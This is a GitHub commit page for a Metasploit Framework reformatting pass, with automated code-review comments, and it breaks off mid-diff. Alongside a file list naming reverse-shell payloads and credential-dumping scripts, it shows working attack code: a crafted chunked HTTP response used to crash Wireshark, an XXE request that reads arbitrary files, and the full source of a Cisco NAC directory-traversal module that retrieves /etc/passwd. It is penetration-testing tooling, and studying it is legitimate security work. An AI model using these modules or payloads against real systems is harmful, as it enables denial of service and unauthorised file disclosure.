
big msftidy pass, ping me if there are issues

git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da
1 parent 5caaedc commit 62c8c6ea9fa27a1a36f8cb36282e5f81654eb494 @jduck jduck committed Oct 23, 2011
Showing with 2,607 additions and 2,386 deletions.
  1. +50 −2 modules/auxiliary/dos/wireshark/chunked.rb
  2. +9 −1 modules/auxiliary/scanner/http/adobe_xml_inject.rb
  3. +83 −83 modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
  4. +3 −1 modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb
  5. +3 −1 modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
  6. +2 −2 modules/auxiliary/scanner/http/scraper.rb
  7. +2 −1 modules/auxiliary/scanner/oracle/isqlplus_login.rb
  8. +6 −3 modules/auxiliary/scanner/postgres/postgres_login.rb
  9. +157 −157 modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
  10. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb
  11. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
  12. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb
  13. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb
  14. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb
  15. +192 −192 modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb
  16. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb
  17. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb
  18. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb
  19. 0 modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb
  20. 0 modules/auxiliary/scanner/sap/sap_service_discovery.rb
  21. +2 −2 modules/auxiliary/scanner/voice/recorder.rb
  22. +6 −4 modules/auxiliary/server/capture/smb.rb
  23. +1 −1 modules/auxiliary/server/webkit_xslt_dropper.rb
  24. +3 −3 modules/auxiliary/spoof/wifi/airpwn.rb
  25. +10 −4 modules/auxiliary/sqli/oracle/jvm_os_code_10g.rb
  26. +2 −2 modules/auxiliary/vsploit/pii/web_pii.rb
  27. +4 −1 modules/exploits/linux/pptp/poptop_negative_read.rb
  28. +10 −10 modules/exploits/multi/http/glassfish_deployer.rb
  29. +2 −2 modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
  30. +2 −2 modules/exploits/solaris/sunrpc/sadmind_exec.rb
  31. +3 −1 modules/exploits/unix/webapp/php_vbulletin_template.rb
  32. +3 −1 modules/exploits/unix/webapp/php_xmlrpc_eval.rb
  33. +4 −3 modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb
  34. +1 −1 modules/exploits/windows/browser/citrix_gateway_actx.rb
  35. +2 −2 modules/exploits/windows/browser/mozilla_interleaved_write.rb
  36. +3 −3 modules/exploits/windows/browser/mozilla_mchannel.rb
  37. +14 −6 modules/exploits/windows/browser/ms08_078_xml_corruption.rb
  38. +3 −2 modules/exploits/windows/browser/ms10_002_aurora.rb
  39. +3 −1 modules/exploits/windows/browser/ms10_042_helpctr_xss_cmd_exec.rb
  40. +1 −2 modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
  41. +1 −1 modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
  42. +34 −34 modules/exploits/windows/browser/pcvue_func.rb
  43. +25 −25 modules/exploits/windows/browser/teechart_pro.rb
  44. +3 −2 modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
  45. +3 −2 modules/exploits/windows/fileformat/adobe_libtiff.rb
  46. +2 −2 modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb
  47. +2 −1 modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb
  48. +2 −2 modules/exploits/windows/fileformat/deepburner_path.rb
  49. 0 modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
  50. +7 −7 modules/exploits/windows/fileformat/ezip_wizard_bof.rb
  51. +1 −1 modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
  52. +5 −6 modules/exploits/windows/fileformat/scadaphone_zip.rb
  53. +4 −3 modules/exploits/windows/http/hp_nnm_ovas.rb
  54. +1 −1 modules/exploits/windows/http/hp_power_manager_filename.rb
  55. +1 −0 modules/exploits/windows/http/osb_uname_jlist.rb
  56. +1 −2 modules/exploits/windows/misc/wireshark_packet_dect.rb
  57. +4 −0 modules/payloads/singles/linux/armle/adduser.rb
  58. +12 −0 modules/payloads/singles/linux/x64/exec.rb
  59. +12 −0 modules/payloads/singles/linux/x64/shell_bind_tcp.rb
  60. +12 −0 modules/payloads/singles/linux/x64/shell_reverse_tcp.rb
  61. +1 −0 modules/payloads/singles/windows/exec.rb
  62. +1 −0 modules/payloads/singles/windows/loadlibrary.rb
  63. +1 −1 modules/payloads/stagers/java/reverse_https.rb
  64. +12 −0 modules/payloads/stagers/linux/x64/bind_tcp.rb
  65. +12 −0 modules/payloads/stagers/linux/x64/reverse_tcp.rb
  66. +12 −0 modules/payloads/stages/linux/x64/shell.rb
  67. +1 −0 modules/payloads/stages/osx/x86/bundleinject.rb
  68. +1 −0 modules/payloads/stages/windows/dllinject.rb
  69. +1 −0 modules/payloads/stages/windows/patchupdllinject.rb
  70. +4 −4 modules/post/multi/gather/dns_bruteforce.rb
  71. +19 −19 modules/post/multi/gather/dns_srv_lookup.rb
  72. +3 −3 modules/post/multi/gather/ping_sweep.rb
  73. +11 −11 modules/post/multi/manage/system_session.rb
  74. +1 −7 modules/post/windows/gather/arp_scanner.rb
  75. +1 −1 modules/post/windows/gather/bitcoin_jacker.rb
  76. +1 −1 modules/post/windows/gather/cachedump.rb
  77. +6 −6 modules/post/windows/gather/credentials/enum_cred_store.rb
  78. +4 −2 modules/post/windows/gather/credentials/filezilla_server.rb
  79. +36 −30 modules/post/windows/gather/credentials/outlook.rb
  80. +14 −14 modules/post/windows/gather/credentials/vnc.rb
  81. +2 −3 modules/post/windows/gather/credentials/windows_autologin.rb
  82. +2 −2 modules/post/windows/gather/dumplinks.rb
  83. +5 −5 modules/post/windows/gather/enum_dirperms.rb
  84. +15 −14 modules/post/windows/gather/enum_ms_product_keys.rb
  85. +7 −8 modules/post/windows/gather/memory_grep.rb
  86. +7 −7 modules/post/windows/gather/reverse_lookup.rb
  87. +4 −4 modules/post/windows/gather/usb_history.rb
  88. +2 −4 modules/post/windows/manage/autoroute.rb
  89. +4 −2 modules/post/windows/manage/delete_user.rb
  90. +2 −2 plugins/db_credcollect.rb
  91. +4 −4 plugins/ips_filter.rb
  92. +75 −74 plugins/lab.rb
  93. +2 −2 plugins/msfd.rb
  94. +355 −364 plugins/nessus.rb
  95. +34 −34 plugins/nexpose.rb
  96. +30 −22 plugins/openvas.rb
  97. +5 −5 plugins/pcap_log.rb
  98. +165 −165 plugins/wmap.rb
  99. +1 −1 plugins/xmlrpc.rb
  100. +8 −14 scripts/meterpreter/arp_scanner.rb
  101. +1 −0 scripts/meterpreter/autoroute.rb
  102. +33 −31 scripts/meterpreter/checkvm.rb
  103. +1 −0 scripts/meterpreter/credcollect.rb
  104. +11 −11 scripts/meterpreter/domain_list_gen.rb
  105. +3 −3 scripts/meterpreter/duplicate.rb
  106. +5 −5 scripts/meterpreter/enum_chrome.rb
  107. +27 −27 scripts/meterpreter/enum_firefox.rb
  108. +1 −0 scripts/meterpreter/enum_powershell_env.rb
  109. +1 −0 scripts/meterpreter/enum_putty.rb
  110. +3 −2 scripts/meterpreter/enum_vmware.rb
  111. +1 −2 scripts/meterpreter/event_manager.rb
  112. +10 −10 scripts/meterpreter/get_application_list.rb
  113. +1 −0 scripts/meterpreter/get_env.rb
  114. +4 −3 scripts/meterpreter/get_filezilla_creds.rb
  115. +6 −5 scripts/meterpreter/get_local_subnets.rb
  116. +3 −0 scripts/meterpreter/get_valid_community.rb
  117. +5 −4 scripts/meterpreter/getcountermeasure.rb
  118. +2 −2 scripts/meterpreter/gettelnet.rb
  119. +18 −17 scripts/meterpreter/hashdump.rb
  120. +1 −0 scripts/meterpreter/hostsedit.rb
  121. +1 −1 scripts/meterpreter/keylogrecorder.rb
  122. +1 −0 scripts/meterpreter/killav.rb
  123. +1 −0 scripts/meterpreter/metsvc.rb
  124. +1 −0 scripts/meterpreter/migrate.rb
  125. +23 −23 scripts/meterpreter/multi_console_command.rb
  126. +10 −9 scripts/meterpreter/multicommand.rb
  127. +1 −0 scripts/meterpreter/multiscript.rb
  128. +159 −155 scripts/meterpreter/netenum.rb
  129. +13 −12 scripts/meterpreter/panda_2007_pavsrv51.rb
  130. +1 −0 scripts/meterpreter/pml_driver_config.rb
  131. +3 −2 scripts/meterpreter/powerdump.rb
  132. +8 −7 scripts/meterpreter/prefetchtool.rb
  133. +12 −12 scripts/meterpreter/process_memdump.rb
  134. +42 −44 scripts/meterpreter/remotewinenum.rb
  135. +1 −0 scripts/meterpreter/scheduleme.rb
  136. +1 −0 scripts/meterpreter/schelevator.rb
  137. +7 −6 scripts/meterpreter/schtasksabuse.rb
  138. +5 −1 scripts/meterpreter/screen_unlock.rb
  139. +38 −36 scripts/meterpreter/screenspy.rb
  140. +1 −0 scripts/meterpreter/search_dwld.rb
  141. +203 −201 scripts/meterpreter/service_permissions_escalate.rb
  142. +1 −1 scripts/meterpreter/sound_recorder.rb
  143. +3 −1 scripts/meterpreter/srt_webdrive_priv.rb
  144. +1 −0 scripts/meterpreter/uploadexec.rb
  145. +2 −0 scripts/meterpreter/virtualbox_sysenter_dos.rb
  146. +208 −205 scripts/meterpreter/virusscan_bypass.rb
  147. +1 −0 scripts/meterpreter/vnc.rb
  148. +2 −2 scripts/meterpreter/webcam.rb
  149. +1 −0 scripts/meterpreter/win32-sshclient.rb
  150. +1 −0 scripts/meterpreter/win32-sshserver.rb
  151. +72 −76 scripts/meterpreter/winbf.rb
  152. +2 −2 scripts/meterpreter/wmic.rb
  153. +1 −0 scripts/shell/migrate.rb
  154. +1 −0 scripts/shell/spawn_meterpreter.rb
  155. +2 −1 tools/import_webscarab.rb
  156. +5 −5 tools/list_interfaces.rb
  157. +40 −40 tools/lm2ntcrack.rb
  158. +2 −0 tools/vxdigger.rb
  159. +2 −2 tools/vxencrypt.rb
  160. +2 −0 tools/vxmaster.rb
@@ -57,8 +57,56 @@ def run
p.tcp_sport = datastore['SPORT'].to_i
p.tcp_window = 3072
- # That's some mighty fine ASCII right there.
- p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\
x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
+ # The following hex blob contains an HTTP response with a chunked-encoding
+ # length of 0. The ASCII version is below in a block comment.
+ #
+ # We represent it like this to prevent tools from mangling the carriage
+ # returns within it.
+ #
+ p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75" +
+ "\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32" +
+ "\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39" +
+ "\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a" +
+ "\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28" +
+ "\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20" +
+ "\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31" +
+ "\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61" +
+ "\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c" +
+ "\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f" +
+ "\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65" +
+ "\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50" +
+ "\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34" +
+ "\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20" +
+ "\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" +
+ "\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50" +
+ "\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74" +
+ "\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33" +
+ "\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22" +
+ "\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20" +
+ "\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20" +
+ "\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20" +
+ "\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78" +
+ "\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e" +
+ "\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30" +
+ "\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f" +
+ "\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
+ "\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74" +
+ "\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d" +
+ "\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f" +
+ "\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53" +
+ "\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45" +
+ "\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30" +
+ "\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64" +
+ "\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44" +
+ "\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a" +
+ "\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78" +
+ "\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e" +
+ "\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72" +
+ "\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a" +
+ "\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
+ "\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74" +
+ "\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d" +
+ "\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
p.recalc
capture_sendto(p, rhost)
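Review bot: The new `p.payload` assignment joins 44 string literals with `+`, so every call to run rebuilds the blob through roughly 43 intermediate String allocations at runtime; ending each line with ` \` instead of ` +` makes the parser concatenate the adjacent literals once at load time, e.g. `p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75" \` followed by `"\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32" \`. The same `+`-chained literal pattern appears in the `webdav_req` assignments of the dir_webdav_unicode_bypass.rb and ms09_020_webdav_unicode_bypass.rb hunks. The new comment says an ASCII rendering follows in a block comment, which is outside this hunk, so I cannot confirm it still matches the bytes after the re-split; a line such as `# Keep the ASCII block comment below in sync with these bytes.` would make that maintenance duty explicit. The body of run continues past the end of the hunk.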
@@ -64,7 +64,15 @@ def run_host(ip)
"/lcds-samples/messagebroker/httpsecure", # LCDS -- SSL
]
- postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?><\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]><amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\"><body><object type=\"flex.messaging.messages.CommandMessage\"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
+ postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?>"
+ postrequest << "<\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>"
+ postrequest << "<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">"
+ postrequest << "<body><object type=\"flex.messaging.messages.CommandMessage\"><traits>"
+ postrequest << "<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>"
+ postrequest << "<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>"
+ postrequest << "<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>"
+ postrequest << "<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>"
+ postrequest << "<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
path.each do | check |
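Review bot: The `\?` and `\!` escapes in the first three new `postrequest` lines are no-ops inside a double-quoted Ruby string (`"\?"` is just `?`), so they only obscure the XML; write `postrequest = "<?xml version=\"1.0\" encoding=\"utf-8\"?>"` and `postrequest << "<!DOCTYPE test [ <!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>"`. That second line also interpolates `datastore['FILE']` unescaped inside the quoted SYSTEM literal, carried over from the old single-line form, so a FILE value containing `"` yields a malformed DTD rather than the intended probe; a short guard on the option value, or a comment stating that FILE must not contain double quotes, would make that constraint visible. run_host continues outside the hunk.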
@@ -1,84 +1,84 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Remote::HttpClient
- include Msf::Auxiliary::WMAPScanServer
- include Msf::Auxiliary::Scanner
-
- def initialize
- super(
- 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
- 'Version' => '$Revision$',
- 'Description' => %q{
- This module tests whether a directory traversal vulnerablity is present
- in versions of Cisco Network Access Manager 4.8.x You may wish to change
- FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
- },
- 'References' =>
- [
- [ 'CVE', '2011-3305' ],
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WMAPScanServer
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
+ 'Version' => '$Revision$',
+ 'Description' => %q{
+ This module tests whether a directory traversal vulnerablity is present
+ in versions of Cisco Network Access Manager 4.8.x You may wish to change
+ FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2011-3305' ],
[ 'OSVDB', '76080'],
- [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
- [ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
- ],
- 'Author' => [ 'nenad' ],
- 'License' => MSF_LICENSE
- )
-
- register_options(
- [
- Opt::RPORT(443),
- OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
- OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
- ], self.class)
- end
-
- def run_host(ip)
-
- traversal = '../../'
- part1= '/admin/file_download?tag='
- part2 = '&fileType=snapshot'
-
- begin
- print_status("Attempting to connect to #{rhost}:#{rport}")
- res = send_request_raw(
- {
- 'method' => 'GET',
- 'uri' => '/admin',
- }, 25)
-
- if (res)
- 1.upto(datastore['MAXDIRS']) do |level|
- try = traversal * level
- traversalstring = part1 + try + datastore['FILE'] + part2
- res = send_request_raw(
- {
- 'method' => 'GET',
- 'uri' => traversalstring,
- }, 25)
- if (res and res.code == 200)
- print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
- break
- elsif (res and res.code)
- print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
- end
- end
- end
-
- rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
- rescue ::Timeout::Error, ::Errno::EPIPE
- end
- end
-end
+ [ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
+ [ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
+ ],
+ 'Author' => [ 'nenad' ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ Opt::RPORT(443),
+ OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
+ OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
+ ], self.class)
+ end
+
+ def run_host(ip)
+
+ traversal = '../../'
+ part1= '/admin/file_download?tag='
+ part2 = '&fileType=snapshot'
+
+ begin
+ print_status("Attempting to connect to #{rhost}:#{rport}")
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => '/admin',
+ }, 25)
+
+ if (res)
+ 1.upto(datastore['MAXDIRS']) do |level|
+ try = traversal * level
+ traversalstring = part1 + try + datastore['FILE'] + part2
+ res = send_request_raw(
+ {
+ 'method' => 'GET',
+ 'uri' => traversalstring,
+ }, 25)
+ if (res and res.code == 200)
+ print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
+ break
+ elsif (res and res.code)
+ print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
+ end
+ end
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+end
@@ -124,7 +124,9 @@ def run_host(ip)
return if not conn
- webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
+ webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
+ '<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
+ '<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
File.open(datastore['DICTIONARY'], 'rb').each do |testf|
begin
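Review bot: The context line `File.open(datastore['DICTIONARY'], 'rb').each do |testf|` immediately after the new `webdav_req` lines opens the dictionary without a block, so the file handle is only released whenever the object is garbage-collected; wrap it as `File.open(datastore['DICTIONARY'], 'rb') do |dict|` and `dict.each do |testf|`, with a matching extra `end` at the loop's close. The loop body and that closing `end` lie outside the hunk, as does the rest of run_host.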
@@ -59,7 +59,9 @@ def run_host(ip)
vhost = datastore['VHOST'] || wmap_target_host
prot = datastore['SSL'] ? 'https' : 'http'
- webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
+ webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
